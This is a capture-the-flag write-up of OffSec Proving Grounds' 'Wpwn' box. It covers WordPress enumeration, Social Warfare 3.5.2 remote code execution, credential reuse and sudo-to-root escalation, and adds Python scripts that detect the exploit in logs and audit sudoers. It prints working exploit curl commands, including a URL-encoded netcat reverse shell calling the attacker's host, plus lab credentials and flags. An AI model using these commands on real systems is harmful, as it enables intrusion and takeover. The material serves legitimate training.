Proving Grounds | Wpwn

Hi amazing hackers from around the world, back again with another write-up of a box. This time it’s from OffSec’s Proving Grounds. If you would like to read more write-ups, please check my GitLab repository.

Try harder! Credits to Offensive Security

Enumeration

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

That’s the basic information you get from the scan: SSH and an Apache web server.

Web

  • Apache 2.4.38
  • WordPress 5.5
  • robots.txt contains :
/secret -> 404
# haha, just kidding. Focus on real stuff ma boi

Looks like it’s just a fake robots.txt, that’s fine keep enumerating!

FeroxBuster

FeroxBuster is a tool to discover directories and files on a server. It’s pretty similar to GoBuster, but it’s much faster and it has emojis!

  • Found /wordpress
200    3l    5w    23c http://192.168.85.123/
301    9l   28w   320c http://192.168.85.123/wordpress
  • Now that we know the target runs WordPress, we can use a dedicated tool.

WPSCAN

wpscan is a tool made by the wpscanteam to enumerate a WordPress installation and test its security.

  • 1 user identified: admin
  • Plugin detected: social-warfare version 3.5.2

Exploit

Now that we have some information about our target, let’s do some research! Social Warfare 3.5.2 has a known remote code execution flaw: when called with swp_debug=load_options, the plugin fetches the URL passed in swp_url and evaluates the code it returns, so a file we host ourselves gets executed on the target.

curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=hostname&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"
  • We’ll see the hostname in the response
wpwn
<!DOCTYPE html>
<html lang="en-US">
<head>
  • Let’s get a reverse shell.
  • Payload needs to be URL encoded.
    rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff
curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"

pwncat is a listener similar to netcat, but with more features; here it catches the reverse shell and upgrades it automatically.

[15:09:39] Welcome to pwncat 🐈! __main__.py:153
[15:10:28] received connection from 192.168.85.123:54858 bind.py:76
[15:10:31] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:504
[15:10:34] 192.168.85.123:54858: registered new host w/ db
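On the defender’s side, the request shape used above is easy to spot in the web server logs. The following is an added example, not code from the original write-up: it parses Apache combined-format access log lines and reports any request to admin-post.php that combines swp_debug=load_options with an swp_url pointing at a host other than the site itself. The log lines in SAMPLE_LOG are constructed for the demo, and the site host is assumed to be 192.168.85.123 as in the write-up.

```python
"""Flag Social Warfare load_options abuse in Apache access logs.

Added example, not code from the original write-up. Each combined-format log
line is parsed, and a request to admin-post.php that combines
swp_debug=load_options with an swp_url whose host is not the site itself is
reported. The log lines in SAMPLE_LOG are constructed for this demo; the site
host (192.168.85.123) is assumed from the write-up.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log: client ident user [time] "METHOD path PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SITE_HOSTS = ("192.168.85.123",)  # assumption: the WordPress host from the write-up


def inspect_line(line, site_hosts=SITE_HOSTS):
    """Return a finding dict for a suspicious request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return None
    params = parse_qs(url.query)  # percent-decodes values, so encoded payloads become readable
    if params.get("swp_debug", [""])[0] != "load_options":
        return None
    fetch_host = urlsplit(params.get("swp_url", [""])[0]).hostname
    if fetch_host is None or fetch_host in site_hosts:
        return None  # the plugin loading options from its own site is the expected use
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "fetch_host": fetch_host,
        "rce_param": params.get("rce", [None])[0],
    }


def scan(lines, site_hosts=SITE_HOSTS):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    findings = []
    for line in lines:
        hit = inspect_line(line, site_hosts)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample: a benign admin-ajax call, a self-referencing swp_url, and the write-up's request
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Oct/2020:15:01:12 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2020:15:03:40 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.85.123/wordpress/ HTTP/1.1" 200 410 "-" "Mozilla/5.0"',
    '192.168.49.85 - - [10/Oct/2020:15:09:39 +0000] "GET /wordpress/wp-admin/admin-post.php?rce=hostname&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php HTTP/1.1" 200 2154 "-" "curl/7.72.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} fetched code from {hit['fetch_host']} (rce={hit['rce_param']})")
```

Feed scan() the lines of /var/log/apache2/access.log (the default location on Debian) to run it over real traffic. The self-referencing case is deliberately ignored because the plugin’s legitimate debug mode fetches the site’s own URL; everything that points elsewhere is worth an alert, and the decoded rce value tells you what was attempted.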

Privilege Escalation

Now that we have a shell in the machine, it’s time to escalate our privileges!

  • We are www-data and have no password, so sudo -l is not an option yet.
  • Found the MySQL database credentials in wp-config.php.
/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
wp_user:R3&]vzhHmMn9,:-5
  • Found the admin password hash in the wp_users table.
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1 |
+------------+------------------------------------+
  • The hash is a WordPress (phpass) hash, hashcat mode 400.
  • While the password is cracking, we should keep looking around.
  • Found local.txt in /var/www
    80d2c0fa4fec51cad65e486bbecf34ab

One thing I always check is whether the DB password has been reused as a user’s password, which happens a lot.

  • We have one user which is takis
  • DB password is reused for user takis. We are now user takis.
  • Check sudo -l
User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL

Would you look at that: we don’t even need to find another vector to escalate to root.

  • We can run anything with sudo, so sudo bash gives us a root shell.
  • proof.txt in /root
    a6f62db372a1a76f723cc2a8e1594ec6
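The takis entry is the kind of sudo rule an administrator should never have to discover from a write-up. As an added example (not code from the original post), the script below parses sudoers user specifications and the entry lines printed by sudo -l, and rates each one: NOPASSWD combined with ALL commands is the worst case, since any foothold as that user, such as the reused database password above, is already root. The sudoers text is constructed for the demo; the sudo -l sample mirrors the output in the write-up.

```python
"""Audit sudo privilege specs for passwordless, unrestricted access.

Added example, not code from the original write-up. It parses the user
specifications in a sudoers file as well as the entry lines printed by
`sudo -l`, and rates each one. The sudoers text below is constructed for this
demo; the sudo -l sample mirrors the write-up's output.
"""
import re

SUDO_TAGS = {"NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "EXEC", "NOEXEC",
             "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
             "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}
SKIP_KEYWORDS = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "@")

# sudoers user spec:   who  host = (runas) [TAG:]... cmd, cmd
SUDOERS_RE = re.compile(r"^(?P<who>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*(?P<spec>.+)$")
# the part after '=' (also what `sudo -l` prints per entry): (runas) [TAG:]... cmd, cmd
SPEC_RE = re.compile(r"^(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")


def parse_spec(spec):
    """Split '(runas) TAG: cmd, cmd' into (runas, tags, commands)."""
    m = SPEC_RE.match(spec.strip())
    runas = (m.group("runas") or "root").strip()  # sudo's default runas user is root
    rest = m.group("rest").strip()
    tags = []
    while True:
        t = re.match(r"([A-Z_]+):\s*", rest)
        if not t or t.group(1) not in SUDO_TAGS:
            break
        tags.append(t.group(1))
        rest = rest[t.end():]
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    return runas, tags, commands


def classify(tags, commands):
    """Rate a spec by how directly it hands out root."""
    nopasswd = "NOPASSWD" in tags
    unrestricted = "ALL" in commands
    if nopasswd and unrestricted:
        return "critical"  # any shell as this user is root: the case in the write-up
    if unrestricted:
        return "high"      # root, but the user's own password is still required
    if nopasswd:
        return "review"    # passwordless but scoped; check each command for shell escapes
    return "ok"


def audit_sudoers(text):
    """Return one finding per user specification in sudoers-format text."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_KEYWORDS):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        runas, tags, commands = parse_spec(m.group("spec"))
        findings.append({"who": m.group("who"), "host": m.group("host"), "runas": runas,
                         "tags": tags, "commands": commands,
                         "severity": classify(tags, commands)})
    return findings


def audit_sudo_l(output):
    """Parse `sudo -l` output: a 'User X may run ... on HOST:' header followed by entries."""
    findings = []
    who = host = None
    for line in output.splitlines():
        h = re.match(r"User (\S+) may run the following commands on (\S+):", line.strip())
        if h:
            who, host = h.groups()
            continue
        if who and line.strip():
            runas, tags, commands = parse_spec(line)
            findings.append({"who": who, "host": host, "runas": runas, "tags": tags,
                             "commands": commands, "severity": classify(tags, commands)})
    return findings


SUDOERS_SAMPLE = """\
# constructed sample /etc/sudoers
Defaults\tenv_reset
root\tALL=(ALL:ALL) ALL
%sudo\tALL=(ALL:ALL) ALL
takis\tALL=(ALL) NOPASSWD: ALL
deploy\tALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""

SUDO_L_SAMPLE = """\
User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS_SAMPLE) + audit_sudo_l(SUDO_L_SAMPLE):
        print(f"{f['severity']:8} {f['who']}@{f['host']} as ({f['runas']}) {f['tags']} {f['commands']}")
```

The "review" rating is deliberate: a NOPASSWD rule scoped to one binary is not automatically safe, since editors, pagers and anything that spawns a subprocess still escape to a shell, so those entries need a look at the command rather than a pass.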

And that’s all, we’re root!

Student that loves FOSS